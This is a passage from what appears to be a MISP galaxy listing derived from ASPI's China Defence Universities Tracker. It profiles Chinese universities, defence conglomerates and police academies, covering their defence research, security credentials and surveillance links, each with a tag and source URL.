Table 852. Table References

Links

https://unitracker.aspi.org.au/universities/beijing-institute-of-technology

Beijing University of Chemical Technology (北京化工大学)

BUCT is subordinate to the Ministry of Education. The university engages in high levels of defence research. In 2016, the Ministry of Education and defence industry agency SASTIND agreed to jointly construct BUCT, a move designed to expand its involvement in defence research.Between 2011 and 2015, the university’s spending on defence research reached RMB272 million (AUD56 million), approximately 15% of the university’s research spending and an increase of around 50% over the previous five years.BUCT specialises in the development and application of critical materials for the defence industry. Its research on carbon fibres has been applied to the aerospace industry.BUCT holds secret-level security credentials, allowing it to participate in classified defence and weapons technology projects.

The tag is: misp-galaxy:china-defence-universities="Beijing University of Chemical Technology (北京化工大学)"

Table 853. Table References

Links

https://unitracker.aspi.org.au/universities/beijing-university-of-chemical-technology

Beijing University of Posts and Telecommunications (北京邮电大学)

BUPT is subordinate to the Ministry of Education in addition to being jointly constructed by the Ministry of Industry and Information Technology. BUPT is one of eight Chinese universities known to have received top-secret security credentials. Since its establishment, the university has focused on information engineering and computer science, and has continued to produce important defence and security technology research.The School of Cyberspace Security is home to one of the university’s two defence laboratories—the Key Laboratory of Network and Information Attack & Defense Technology of Ministry of Education—which carries out research for the Chinese military related to cyber attacks.BUPT is a member of several military-civilian fusion (MCF) alliances and has been awarded for its contributions to MCF and the PLA. During the past three years, major employers of BUPT graduates include the Ministry of State Security, the Ministry of Public Security and MIIT. This suggests a close relationship between BUPT and China’s security and intelligence agencies.

The tag is: misp-galaxy:china-defence-universities="Beijing University of Posts and Telecommunications (北京邮电大学)"

Table 854. Table References

Links

https://unitracker.aspi.org.au/universities/beijing-university-of-posts-and-telecommunications

Central South University (中南大学)

Out of all universities subordinate to the MOE, CSU reportedly receives the most military research funding and was the first to receive a weapons production license. In 2008 and 2011 respectively, the defence industry agency SASTIND and the Ministry of Education (MOE) signed agreements to jointly supervise CSU. Under this arrangement, SASTIND committed to expanding CSU’s involvement in defence research and support the development of its School of Aeronautics and Astronautics and Military Industry Technology Research Institute.CSU’s defence research appears to focus on metallurgy, materials science, and aviation technology, including the development of heat-resistant materials for aeroplane and rocket engines. The university has been involved in the development of China’s first atomic bomb, first intermediate-range ballistic missile, and first nuclear submarine. In 2018, it signed a strategic cooperation agreement with the Chinese Academy of Launch Vehicle Technology, a subsidiary of China Aerospace Science and Technology Corporation that is included on the US BIS Entity List for its involvement in developing rockets.

The tag is: misp-galaxy:china-defence-universities="Central South University (中南大学)"

Table 855. Table References

Links

https://unitracker.aspi.org.au/universities/central-south-university

Changchun University of Science and Technology (长春理工大学)

CUST is primarily supervised by the Jilin Provincial Government but has also been under the administration of SASTIND and its predecessors for over 30 years over its history. The university specialises in photoelectric technology and has a strong focus on defence research. CUST describes itself as having ‘safeguarding national defence as its sublime responsibility and sacred mission.’CUST is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armaments science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器). In April 2018, CUST established the School of Artificial Intelligence (人工智能学院) and the Artificial Intelligence Research Institute (人工智能研究院 ). CUST researchers working on AI are likely involved in research related to facial recognition technology.

The tag is: misp-galaxy:china-defence-universities="Changchun University of Science and Technology (长春理工大学)"

Table 856. Table References

Links

https://unitracker.aspi.org.au/universities/changchun-university-of-science-and-technology

China Aerodynamics Research and Development Center (中国空气动力研究与发展中心)

CARDC claims to be China’s largest aerodynamics research and testing base. It hosts the State Key Laboratory of Aerodynamics (空气动力学国家重点实验室), which includes five wind tunnels and a large computer cluster. CARDC is heavily involved in research on hypersonics.While CARDC is a military unit, its website does not mention this. The PLA officers leading the facility are instead pictured on its website in civilian clothes(pictured: CARDC director, Major General Fan Zhaolin (范召林) in uniform (above) and in civilian attire on CARDC’s website (below).

The tag is: misp-galaxy:china-defence-universities="China Aerodynamics Research and Development Center (中国空气动力研究与发展中心)"

Table 857. Table References

Links

https://unitracker.aspi.org.au/universities/china-aerodynamics-research-and-development-center

China Aerospace Science and Industry Corporation (中国航天科工集团有限公司)

CASIC specialises in defence equipment and aerospace products, particularly short- and medium-range missiles. CASIC is a leading provider to the Chinese military of high-end capabilities such as air-defence, cruise, and ballistic missile systems along with space launch vehicles, micro-satellites and anti-satellite interceptors, according to Mark Stokes and Dean Cheng. CASIC employs over 146,000 employees and is on the Fortune 500 list with revenue exceeding USD37 billion (AUD55 billion).Although defence products form part of CASIC’s main product line, the company also produces products for civilian customers such as electronics, communications equipment and medical equipment. Nevertheless, CASIC claims that it ‘will always uphold its core value of ranking national interests above all’, which indicates that civilian products receive less priority than defence equipment.

The tag is: misp-galaxy:china-defence-universities="China Aerospace Science and Industry Corporation (中国航天科工集团有限公司)"

Table 858. Table References

Links

https://unitracker.aspi.org.au/universities/china-aerospace-science-and-industry-corporation

China Aerospace Science and Technology Corporation (中国航天科技集团)

CASC was established in 1999 as a defence aerospace conglomerate. The company is primarily focused on ‘developing carrier rockets, various kinds of satellites, … and tactical missile systems.’ With revenues nearing USD38 billion (AUD55 billion), CASC employs nearly 180,000 personnel and is on the Fortune 500 list.PLA experts Mark Stokes and Dean Cheng have noted that CASC’s main products for the PLA include ‘ballistic missiles and space launch vehicles, large solid rocket motors, liquid fuelled engines, satellites, and related sub-assemblies and components.’ The Federation of American Scientists claims CASC is particularly advanced in high-energy propellant technology, satellite applications, strap-on boosters and system integration.CASC maintains an investment business which may be geared towards civilian purposes, according to Bloomberg. The Federation of American Scientists notes that some civilian product lines for CASC include ‘machinery, chemicals, communications equipment, transportation equipment, computers, medical care products and environmental protection equipment.’CASC oversees multiple research academies, which have been separately identified by Mark Stokes and Dean Cheng and by the Nuclear Threat Initiative.The Nuclear Threat Initiative has identified that CASC has the following subordinate companies:

The tag is: misp-galaxy:china-defence-universities="China Aerospace Science and Technology Corporation (中国航天科技集团)"

Table 859. Table References

Links

https://unitracker.aspi.org.au/universities/china-aerospace-science-and-technology-corporation

China Coast Guard Academy (中国人民武装警察部队海警学院)

The China Coast Guard Academy is an institution of higher learning that trains personnel for entry into China’s maritime border defence agency. The academy teaches conducts research and training in maritime law enforcement, warship technology as well as surveillance and intelligence disciplines.The China Coast Guard Academy established the Large Surface Vessel Operation and Simulation Laboratory (大型船艇操纵仿真实验室) in 2016, which focuses on the development of white-hulled boats for the China Coast Guard.

The tag is: misp-galaxy:china-defence-universities="China Coast Guard Academy (中国人民武装警察部队海警学院)"

Table 860. Table References

Links

https://unitracker.aspi.org.au/universities/china-coast-guard-academy

China Electronics Corporation (中国电子信息产业集团有限公司)

CEC is a state-owned conglomerate that produces dual-use electronics. The company was established in 1989 to produce semi-conductors, electronic components, software and telecommunications products. The company describes itself as a defence industry conglomerate.CEC is one of China’s largest companies with nearly 120 thousand employees. CEC claims to hold 22 subordinate enterprises and 14 listed companies. Global Security has provided a list of CEC’s 36 member companies in English.CEC is divided into two operational groups. First is the China Electronics Party Institute (中国电子党校), which provides disciplinary oversight and organises communist party activities within CEC. Second is the Science and Technology Committee (科学技术委员会), which is responsible for research and development within CEC.CEC’s defence electronics are developed by the Military Engineering Department (军工部) within CEC’s Science and Technology Committee. Key defence electronics produced by CEC include tracking stations, radar technology, as well as command and control systems. The company maintains its own office for the management of classified information related to defence research. The Federation of American Scientists has identified CEC’s defence-related enterprises on a list that can be found here.

The tag is: misp-galaxy:china-defence-universities="China Electronics Corporation (中国电子信息产业集团有限公司)"

Table 861. Table References

Links

https://unitracker.aspi.org.au/universities/china-electronics-corporation

China Electronics Technology Group Corporation (中国电子科技集团公司)

CETC is a state-owned defence conglomerate that specialises in dual-use electronics. The company was established in 2002 by bringing dozens of research institutes administered by the Ministry of Information Industry, the predecessor to the Ministry of Industry and Information Technology, under one umbrella.CETC is one of the world’s largest defence companies. It claims to have 523 subordinate units and companies and 160,000 employees.CETC divides its defence electronics products into seven categories: air base early warning, integrated electronic information systems, radar, communication and navigation, electronic warfare, UAVs and integrated IFF (identification, friend or foe). CETC also provides technology used for human rights abuses in Xinjiang, where approximately 1.5m are held in re-education camps.Several CETC research institutes and subsidiaries have been added to the US Government’s entity list, restricting exports to them on national security grounds. CETC has been implicated by the US Department of Justice in at least three cases of illegal exports.CETC has a large international market and has also expanded its international research collaboration in recent years. It has a European headquarters in Graz, Austria, and has invested in the University of Technology Sydney.

The tag is: misp-galaxy:china-defence-universities="China Electronics Technology Group Corporation (中国电子科技集团公司)"

Table 862. Table References

Links

https://unitracker.aspi.org.au/universities/china-electronics-technology-group-corporation

China National Nuclear Corporation (中国核工业集团有限公司)

CNCC is the leading state-owned enterprise for China’s civilian and military nuclear programs. It consists of more than 200 subordinate enterprises and research institutes, many of which are listed on the Nuclear Threat Initiative website. In 2018, CNNC took over China’s main nuclear construction company, China Nuclear Engineering and Construction Group (中国核工业建设集团).The company is organized into eight industrial sectors, including nuclear power, nuclear power generation, nuclear fuel, natural uranium, nuclear environmental protection, application of nuclear technologies, non-nuclear civilian products and new energy sources. CNNC is mainly engaged in research and development, design, construction and production operations in the fields of nuclear power, nuclear fuel cycle, nuclear technology application, and nuclear environmental protection engineering.Because of the dual-use nature of nuclear technologies, the nuclear industry is a typical military-civil fusion industry. Naval nuclear power technology and nuclear reactor technology in the reactor core, fuel assembly, safety and security, and radioactive waste treatment all use the same or very similar processes. In March 2019, CNNC established an military-civil fusion fund dedicated to dual-use nuclear technology research and design.Two CNNC subsidiaries have been added to the US Government’s Entity List, restricting exports to them on national security grounds.CNNC has cooperated with U.S. Westinghouse Electric to construct AP1000 nuclear power plants. The company also has a significant overseas presence, signing agreements for joint research with U.S., French, Canadian, U.K., Russian and Argentinian companies.

The tag is: misp-galaxy:china-defence-universities="China National Nuclear Corporation (中国核工业集团有限公司)"

Table 863. Table References

Links

https://unitracker.aspi.org.au/universities/china-national-nuclear-corporation

China North Industries Group (中国兵器工业集团公司)

Norinco Group was established in 1999 as a state-owned defence conglomerate devoted to the development and production of armaments for Chinese and foreign defence customers. Its main defence products include artillery and tear gas, air defence and anti-missile systems, anti-tank missiles and precision-guided munitions as well as armoured vehicles such as main battle tanks and infantry combat vehicles. Bloomberg reports that Norinco Group’s civilian products include various engineering services and heavy-duty construction equipment. Norinco Group employs over 210,000 personnel, has revenues exceeding US$68.8 billion and is listed on the Fortune 500.Norinco Group has hundreds of subsidiaries and subordinate research institutes in China and around the world that have been catalogued by the International Peace Information Service and Omega Research Foundation in their working paper on the company and on Norinco Group’s website.Norinco Group’s Institute of Computer Application Technology (中国兵器工业计算机应用技术研究所) was one of the first adopters of internet technology and remains a leading company for research into network security. The institute hosts four internet research centres and is reported to work with the National Administration for State Secrets Protection (国家保密局) on the Information Security and Testing and Evaluation Centre (涉密信息系统安全保密测评中心).

The tag is: misp-galaxy:china-defence-universities="China North Industries Group (中国兵器工业集团公司)"

Table 864. Table References

Links

https://unitracker.aspi.org.au/universities/china-north-industries-group

China People’s Police University (中国人民警察大学)

The China People’s Police University is an institution of higher learning devoted to training active duty police officers and firefighters in command and management as well as specialist technical officers. The curriculum is separated into two main streams, one for police officers and the other for firefighters. Its police disciplines include immigrant management, entry-exit and border control management, security intelligence, cyber-security, and political work. Its firefighting disciplines include firefighting engineering, electronic information engineering, and nuclear and biochemical fire control.Research facilities at the university include:

The tag is: misp-galaxy:china-defence-universities="China People’s Police University (中国人民警察大学)"

Table 865. Table References

Links

https://unitracker.aspi.org.au/universities/china-peoples-police-university

China Shipbuilding Industry Corporation (中国船舶重工集团有限公司)

CSIC was established as one of China’s primary state-owned defence companies on 1 July 1999. CSIC is the PLA Navy’s largest supplier of weapons platforms, accounting for nearly 80 per cent of all armaments. CSIC’s signature products include conventional and nuclear submarines, warships and torpedoes, as well as the Liaoning aircraft carrier program.CSIC maintains a civilian shipbuilding program alongside its program of supplying the PLA Navy. CSIC’s civilian work includes the production of oil and chemical tankers, container ships, bulk carriers and engineering ships.On 2 July 2019, it was announced that CSIC and the China State Shipbuilding Corporation would merge. According to Janes Defence Weekly, ‘the two groups, which have combined assets of about USD120 billion and employ 240,000 people, dominate naval shipbuilding in China and between them operate 160 subsidiaries.’ Nikkei has listed some of CSIC’s main subsidiaries here.

The tag is: misp-galaxy:china-defence-universities="China Shipbuilding Industry Corporation (中国船舶重工集团有限公司)"

Table 866. Table References

Links

https://unitracker.aspi.org.au/universities/china-shipbuilding-industry-corporation

China South Industries Group (中国兵器装备集团有限公司)

CSGC is a leading producer of armaments for the People’s Liberation Army. It was founded in 1999 and works on technologies such as advanced munitions, mobile assault weapons, lights armaments, information optoelectronics and counter-terrorism equipment. CSGC also maintains civilian product lines focused on the oil and energy sector, but most of the company’s attention goes to developing armaments. The company employs nearly 200,000 personnel, its revenue approaches USD34 billion (AUD50 billion) and it is listed as a Fortune 500 company.CSGC holds a controlling share in more than 60 subsidiaries. 32 of these are listed on the company’s website.

The tag is: misp-galaxy:china-defence-universities="China South Industries Group (中国兵器装备集团有限公司)"

Table 867. Table References

Links

https://unitracker.aspi.org.au/universities/china-south-industries-group

China State Shipbuilding Corporation (中国船舶工业集团有限公司)

CSCC was established as one China’s primary state-owned weapons companies on 1 July 1999 to build ships for military and civilian customers. CSSC markets itself as as the ‘backbone’ of the Chinese navy and its core products include a variety of warships and support vessels. Alongside its program supporting the PLA Navy, Bloomberg notes that CSSC ‘produces oil tankers, bulk carriers, conditioner vessels, deepwater survey ships, and marine equipment.’On 2 July 2019, it was announced that the China Shipbuilding Industry Corporation and the CSSC would merge. According to Jane’s Defence Weekly, ‘the two groups, which have combined assets of about USD120 billion (AUD178 billion) and employ 240,000 people, dominate naval shipbuilding in China and between them operate 160 subsidiaries.’

The tag is: misp-galaxy:china-defence-universities="China State Shipbuilding Corporation (中国船舶工业集团有限公司)"

Table 868. Table References

Links

https://unitracker.aspi.org.au/universities/china-state-shipbuilding-corporation

China University of Geosciences (Wuhan) (中国地质大学)

CUG is subordinate to the Ministry of Education and also supervised by China’s Ministry of Land and Resources. It is actively engaged in defence research and training on geology, hosting the defence-focused Ministry of Education Key Laboratory on Geological Exploration and Evaluation. The laboratory was established in 2018, has 56 staff, and trains students in ‘military geology’.CUG gained secret-level security credentials in 2009, enabling it to participate in classified defence projects.

The tag is: misp-galaxy:china-defence-universities="China University of Geosciences (Wuhan) (中国地质大学)"

Table 869. Table References

Links

https://unitracker.aspi.org.au/universities/china-university-of-geosciences-wuhan

China University of Mining and Technology (中国矿业大学)

CUMT is subordinate to the Ministry of Education and specialises in engineering and other mining and industry-related disciplines. It engages in low levels of defence research.CUMT’s defence research revolves around manufacturing and design, materials science, control science, electronic components, power and energy, and bionics. It appears to be involved in the construction and design of underground bunkers for the military. The academic committee of its State Key Laboratory for Geomechanics and Deep Underground Engineering (深部岩石力学与地下工程国家红点实验室) is headed by PLA underground engineering expert Qian Qihu (钱七虎).

The tag is: misp-galaxy:china-defence-universities="China University of Mining and Technology (中国矿业大学)"

Table 870. Table References

Links

https://unitracker.aspi.org.au/universities/china-university-of-mining-and-technology

Chinese Academy of Engineering Physics (中国工程物理研究院)

CAEP was founded in 1958 and now has over 24,000 employees. It is headquartered in Mianyang, Sichuan Province, but also has facilities in Chengdu and Beijing. Notably, Mianyang is home to a military-civil fusion (MCF) demonstration base—the Sichuan Mianyang High-Technology City. Sichuan Military District Commander Jiang Yongshen (姜永申) in 2016 stressed the important role that Mianyang plays in China’s larger science and technology development and the significance of its military-civil fusion (MCF) demonstration base.The academy is best known for nuclear weapons, but also carries out research on directed-energy weapons. CAEP’s four main tasks are to develop nuclear weapons, research microwaves and lasers for nuclear fusion ignition and directed-energy weapons, study technologies related to conventional weapons, and deepen military-civil fusion. It claims that its research covers 260 specialising, primarily in the broad areas of physics and mathematics, mechanics and engineering, materials and chemistry, electronics and information, and optics and electrical engineering.CAEP hosts part of the Tianhe-2 supercomputer, one of the worlds fastest supercomputers.Despite the sensitivity of its work, CAEP has expanded its international presence in recent years. It claims to send hundreds of scientists overseas to study or work as visiting scholars. CAEP has also used Chinese government talent recruitment schemes such as the Thousand Talents Plan to recruit dozens of scientists from abroad. By 2015, CAEP had recruited 57 scholars through the Thousand Talents Plan, making it one of the largest recruiters of Thousand Talents Plan scholars.CAEP maintains strong collaborative relationships with Chinese civilian universities. It runs a joint laboratory with the University of Electronic Science and Technology of China and collaborates with universities and research institutions including the Chinese Academy of Sciences, the University of Science and Technology of China, Shandong University, Southwest University of Science and Technology, Sichuan University, Jilin University, Peking University and Tsinghua University. CAEP sponsors postgraduate students in many of these institutions who are required to work there for five years after graduating.

The tag is: misp-galaxy:china-defence-universities="Chinese Academy of Engineering Physics (中国工程物理研究院)"

Table 871. Table References

Links

https://unitracker.aspi.org.au/universities/chinese-academy-of-engineering-physics

Chongqing University (重庆大学)

CQU is a leading Chinese research institution subordinate to the Ministry of Education. Chongqing University is home to at least two laboratories devoted to defence research on nanotechnology and control systems. An institution accredited to conduct classified research, Chongqing University is active in improving its security culture with respect to the safeguarding of official secrets.In December 2016, the Ministry of Education entered an agreement with defence industry agency SASTIND to advance military-civil fusion at Chongqing University. Following this agreement, Chongqing University established the defence-focused Ministry of Education Key Laboratory for Complex Systems Safety and Autonomous Control, which works on control systems engineering in May 2018.

The tag is: misp-galaxy:china-defence-universities="Chongqing University (重庆大学)"

Table 872. Table References

Links

https://unitracker.aspi.org.au/universities/chongqing-university

Chongqing University of Posts and Telecommunications (重庆邮电大学)

CQUPT is involved in research on wireless network engineering and testing, next-generation wideband wireless communication, computer networking and information security, intelligent information processing, advanced manufacturing, micro-electronics and specialized chip design. It ranks among the top 100 universities in China for science and technology.The university is supervised by the Ministry of Industry and Information Technology and the Chongqing Municipal Government. It holds secret-level security credentials, allowing it to participate in classified defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Chongqing University of Posts and Telecommunications (重庆邮电大学)"

Table 873. Table References

Links

https://unitracker.aspi.org.au/universities/chongqing-university-of-posts-and-telecommunications

Chongqing University of Technology (重庆理工大学)

CQUT is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science—the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). However its involvement in defence research does not appear as expansive as the other B8 members and it is a relatively low-ranked university. In 2017, its president stated that ‘Chongqing is an important site for the weapons industry, but its military-industrial research and development ability has not yet upgraded.’ Unlike the other members of the B8, SASTIND does not appear to supervise the university.The university has links to Norinco Group and China South Industries Group, China’s largest weapons manufacturers, and was under the supervision of the conglomerates’ predecessor, China Ordnance Industry Corporation, until 1999. In 2017 and 2018, it signed a partnerships with four local defence companies to collaborate on research and training.In 2011, CQUT received secret-level security credentials, enabling it to participate in classified defence projects.

The tag is: misp-galaxy:china-defence-universities="Chongqing University of Technology (重庆理工大学)"

Table 874. Table References

Links

https://unitracker.aspi.org.au/universities/chongqing-university-of-technology

Commercial Aircraft Corporation of China (中国商用飞机有限责任公司)

COMAC was established in 2008 as a state-owned manufacturer of large commercial aircraft. The company oversees eleven subsidiaries that focus on various aspects of aircraft production. A list of COMAC’s subordinate companies can be found in English on the company’s website.Despite its focus on commercial aircraft, China’s Ministry of Industry and Information Technology has referred to it as a defence industry conglomerate. The company maintains strong links to China’s defence industry and some of its leadership is drawn from former executives at state-owned military aircraft and missile manufacturers. China’s leading producer of military aircraft, the Aviation Industry Corporation of China (AVIC), also holds a 10 per cent share in COMAC. COMAC supports the continued development of China’s defence industry by awarding ‘national defence technology scholarships’ to Chinese university students.COMAC’s signature passenger aircraft, the C919, offers an example of how the company could use its civilian aircraft production for military purposes. Numerous Chinese analysts have studied Boeing’s conversion of the 737 into the P-8 Poseidon and E-7A surveillance aircraft and argue that the C919 could also be retrofitted for early warning as well as anti-surface and anti-submarine warfare missions. With a greater flight range than China’s other military aircraft, a retrofitted C919 for maritime surveillance operations could reduce China’s dependence on artificial air bases in the South China Sea which currently render aircraft vulnerable to corrosion due to harsh weather conditions. Vice-Chairman of the Central Military Commission, Zhang Youxia, reportedly expressed an interest in learning from American companies in converting civilian aircraft into military aircraft while inspecting COMAC’s C919.

The tag is: misp-galaxy:china-defence-universities="Commercial Aircraft Corporation of China (中国商用飞机有限责任公司)"

Table 875. Table References

Links

https://unitracker.aspi.org.au/universities/commercial-aircraft-corporation-of-china

Criminal Investigation Police University of China (中国刑事警察学院)

CIPUS was founded in May 1948 and underwent several name changes, but was upgraded in 1981 to become the first police university offering a specialised undergraduate degree program. It runs a national engineering laboratory, two MPS key laboratories, and provincial key laboratories. It is focused on training in criminal investigation, criminology science and technology and criminal law.The university also has relationships with companies that provide the technological tools that contribute to the PRC’s public security apparatus. For instance, it has a relationship with the company Haiyun Data on public security intelligence. Haiyun provides data visualization services for MPS bureaus across China.

The tag is: misp-galaxy:china-defence-universities="Criminal Investigation Police University of China (中国刑事警察学院)"

Table 876. Table References

Links

https://unitracker.aspi.org.au/universities/criminal-investigation-police-university-of-china

Dalian Minzu University (大连民族大学)

DLMU was established in 1984 as an institution that researches China’s ethnic minorities. The university is overseen by the State Ethnic Affairs Commission (SEAC), the Liaoning Provincial Government and the Dalian Municipal Government.Scientific disciplines taught by DLMU include communications and information engineering, machine engineering, civil engineering and environmental science. DLMU also researches political thought and minority groups of northeast China.DLMU currently hosts the Dalian Key Lab of Digital Technology for National Culture (大连市民族文化数字技术重点实验室). Researchers at laboratory carry out research on facial recognition of ethnic minorities. The laboratory has collaborated with an academic from Curtin University on research related to the facial recognition of Tibetans, Koreans and Uyghurs—over one million of whom have disappeared into re-education camps. DLMU researchers are working on a database of facial and optical movements across different ethnic groups.DLMU also hosts the State Ethnic Affairs Commission Key Laboratory of Intelligent Perception and Advanced Control (国家民委智能感知与先进控制重点实验室), housed within the university’s College of Electromechanical Engineering (机电工程学院). The laboratory has done work on convolutional neural networks for visual image recognition, which could have applications for surveillance technology.DLMU’s party committee has an active United Front Work Department. The department supervises non-CCP members and students returning from overseas study. Management of religious and ethnic minorities are likely to be other priorities for the department.

The tag is: misp-galaxy:china-defence-universities="Dalian Minzu University (大连民族大学)"

Table 877. Table References

Links

https://unitracker.aspi.org.au/universities/dalian-minzu-university

Dalian Naval Academy (中国人民解放军海军大连舰艇学院)

The Dalian Naval Academy is one of the main training colleges for junior officers and cadets in the PLA Navy. The academy focuses on maritime navigation technology, communications engineering, electronic information engineering, weapons systems engineering, surveying and control science.Scientists from the Dalian Naval Academy produce publications on a variety of defence topics, including:

The tag is: misp-galaxy:china-defence-universities="Dalian Naval Academy (中国人民解放军海军大连舰艇学院)"

Table 878. Table References

Links

https://unitracker.aspi.org.au/universities/dalian-naval-academy

Dalian University of Technology (大连理工大学)

DLUT is directly under the administration of the Ministry of Education. In 2018, it came under the supervision of defence industry agency SASTIND as part of the government’s efforts to deepen military-civil fusion in the university sector. In 2006, the university received secret-level security credentials, allowing it to participate in classified defence technology projects. Since then, it has expanded cooperation with the PLA Navy and joined several military-civil fusion innovation alliances.In 2015, the university established a defence laboratory in the School of Mechanical Engineering. The laboratory was proposed by a professor within the University’s Institute of Science and Technology. The Institute of Science and Technology is primarily responsible for high-tech project management, where they manage projects for the 973 Program, the National Natural Science Foundation, and the Ministry of Education.

The tag is: misp-galaxy:china-defence-universities="Dalian University of Technology (大连理工大学)"

Table 879. Table References

Links

https://unitracker.aspi.org.au/universities/dalian-university-of-technology

Donghua University (东华大学)

DHU is subordinate to the Ministry of Education. It is actively involved in defence research on materials. It hosts the Key Laboratory of High Performance Fibers & Products, a defence-focused laboratory involved in materials science and textiles engineering research for China’s defence industry and weapons systems. The laboratory is specifically involved in developing materials for weapons casings, vehicular armour, aviation and cabling. The university holds secret-level security credentials, allowing it to participate in classified defence research projects.DHU claims that much of its research has been applied to fields such as defence technology and aviation, and contributed towards China’s space program and Beidou satellite navigation system. In 2018, the university signed a strategic cooperation agreement with the state-owned Jihua Group (际华集团) for collaboration on textiles to meet the military’s needs.

The tag is: misp-galaxy:china-defence-universities="Donghua University (东华大学)"

Table 880. Table References

Links

https://unitracker.aspi.org.au/universities/donghua-university

East China University of Technology (东华理工大学)

ECUT was founded in 1956 as the first institution of higher education for China’s nuclear industry. Since 2001, it has been subject to four ‘joint construction’ agreements between the Jiangxi Provincial Government and defence industry agency SASTIND or its predecessor COSTIND. These agreements are designed to develop the university’s involvement in defense-related research and training. The Ministry of Natural Resources and defence conglomerate China National Nuclear Corporation are also involved in supervising and supporting ECUT.ECUT carries out defence research related to nuclear science and hosts a defence laboratory on radioactive geology. It holds secret-level security credentials, allowing it to participate in classified defence technology projects. In 2006, the East China University of Technology National Defence Technology Institute (东华理工大学国防科技学院) was established.

The tag is: misp-galaxy:china-defence-universities="East China University of Technology (东华理工大学)"

Table 881. Table References

Links

https://unitracker.aspi.org.au/universities/east-china-university-of-technology

Engineering University of the CAPF (中国人民武装警察部队工程大学)

The Engineering University of the CAPF is an institution devoted to training personnel in China’s paramilitary service, the People’s Armed Police, in command and engineering disciplines. The university focuses on paramilitary information engineering, paramilitary equipment technology, non-lethal weapons, military communications and mathematical cryptography. Students of the university can select majors from disciplines such as communications engineering, information security, military big data engineering, management science and engineering, and mechanical engineering.The Engineering University of the CAPF hosts the Key Military Laboratory for Non-Lethal Weapons (非致命武器等全军重点实验室), the Big Data and Cloud Computing Laboratory (大数据与云计算实验室), and the Command Automation Training Centre (指挥自动化培训中心), indicating expertise in these areas.The Engineering University of the CAPF has collaborated significantly with a Beijing-based company called SimpleEdu (北京西普阳光教育科技股份有限公司), focusing primarily on social media and internet research. Below is a list of initiatives with which the Engineering University of the CAPF has collaborated:

The tag is: misp-galaxy:china-defence-universities="Engineering University of the CAPF (中国人民武装警察部队工程大学)"

Table 882. Table References

Links

https://unitracker.aspi.org.au/universities/engineering-university-of-the-capf

Fudan University (复旦大学)

Fudan University is among China’s best universities. It was ranked 104th in the world by Times Higher Education in 2019. The university appears to engage high levels of work for the military on materials science, including stealth technology.All defence-related projects and matters in Fudan are managed by the university’s Institute of Special Materials and Technology (专用材料与装备技术研究院) and Defence Industry Secrets Committee (复旦大学军工保密委员会). The Institute of Special Materials and Technology specialises in defence research and works on simulations, precision manufacturing, and materials. Professor Ye Mingxin, the institute’s director, is also an advisor to the PLA and defence companies on materials science. Fudan University’s Materials Science Department includes one professor who is described as specifically being a ‘defence system professor’, which may refer to Professor Ye. In 2011, Fudan established a State Secrets Academy (国家保密学院),  in partnership with China’s National Administration of State Secrets Protection (国家保密局). The institute carries out research and training on the protection of state secrets.

The tag is: misp-galaxy:china-defence-universities="Fudan University (复旦大学)"

Table 883. Table References

Links

https://unitracker.aspi.org.au/universities/fudan-university

Fuzhou University (福州大学)

Fuzhou University is overseen by the Fujian Provincial Government and a focus on engineering disciplines. It does not appear to engage in significant levels of defence research. However, the Fuzhou University Military-Civil Fusion Innovation Research Institute (福州大学军民融合创新研究院) was jointly established in 2016 by Fuzhou University along with a number defence companies and military research institutions under the guidance of Fujian Provincial Government’s National Defence Industry Office (省国防科工办). Furthermore, the Fujian Provincial People’s Government and SASTIND entered an agreement to jointly develop the university as part of China’s military-civil fusion initiative in 2018. This indicates that the university will expand its involvement in defence research. The university has held second-class weapons R&D secrecy credentials since 2006.

The tag is: misp-galaxy:china-defence-universities="Fuzhou University (福州大学)"

Table 884. Table References

Links

https://unitracker.aspi.org.au/universities/fuzhou-university

Guilin University of Electronic Science and Technology (桂林电子科技大学)

GUET specialises in electronics, communications and computer science. It engages in growing levels of defence research, indicated by the decision to place it under the joint administration of the defence industry agency SASTIND and the Guangxi Provincial Government in 2018.The PLA describes GUET as ‘Guangxi Province’s only university to have long carried out defence research.’ Areas of defence research at the university include communications technology, materials science, signals processing, microwaves, satellite navigation, and command and control. Since 2007, the university has held secret-level security credentials, enabling it to participate in classified weapons and defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Guilin University of Electronic Science and Technology (桂林电子科技大学)"

Table 885. Table References

Links

https://unitracker.aspi.org.au/universities/guilin-university-of-electronic-science-and-technology

Hangzhou Dianzi University (杭州电子科技大学)

HDU specialises in information technology and has been jointly supervised by the Zhejiang Provincial Government and defence industry agency SASTIND since 2007. The university is Zhejiang Province’s only provincial-level higher education institution to have officially designated national defence disciplines.HDU’s leadership is closely integrated with its defence research. Since its creation in 2008, the university’s main defence laboratory has been run by Xue Anke, who was the university’s president until 2017. While president, Xue served on an expert advisory committee to the PLA on information technology. He is also a member of the Zhejiang Provincial Expert Committee on Artificial Intelligence Development.Key areas of defence research at HDU include electronics, artificial intelligence, military-use software, and communications and information systems. HDU has been expanding its research on artificial intelligence, establishing a school of artificial intelligence and an artificial intelligence research institute in 2018.HDU holds secret-level security credentials, allowing it to undertake classified weapons and defence technology projects. In 2011, the Zhejiang State Secrets Bureau established a State Secrets Academy in HDU. The academy, one of twelve in the country, trains personnel in managing and protecting confidential information.

The tag is: misp-galaxy:china-defence-universities="Hangzhou Dianzi University (杭州电子科技大学)"

Table 886. Table References

Links

https://unitracker.aspi.org.au/universities/hangzhou-dianzi-university

Hangzhou Normal University (杭州师范大学)

Hangzhou Normal University is a Chinese university subordinate to the Zhejiang Provincial Government. The university was initially established in 1978 as Hangzhou Normal College (杭州师范学院) to focus on teacher training, art education as well as research in the humanities and natural sciences. Hangzhou Normal University retains this broad academic focus and oversees faculties such as the Alibaba Business School (阿里巴巴商学院).Hangzhou Normal University collaborates with China’s MPS on the development of surveillance technology. In March 2019, the university entered into an agreement with the Zhejiang Police College, the Zhejiang Public Security Office, and Hikvision—China’s leading producer of video surveillance technology—to establish a joint laboratory. The joint laboratory reportedly focuses on applying big data analysis, cloud computing and internet of things technology to improve China’s policing capability.

The tag is: misp-galaxy:china-defence-universities="Hangzhou Normal University (杭州师范大学)"

Table 887. Table References

Links

https://unitracker.aspi.org.au/universities/hangzhou-normal-university

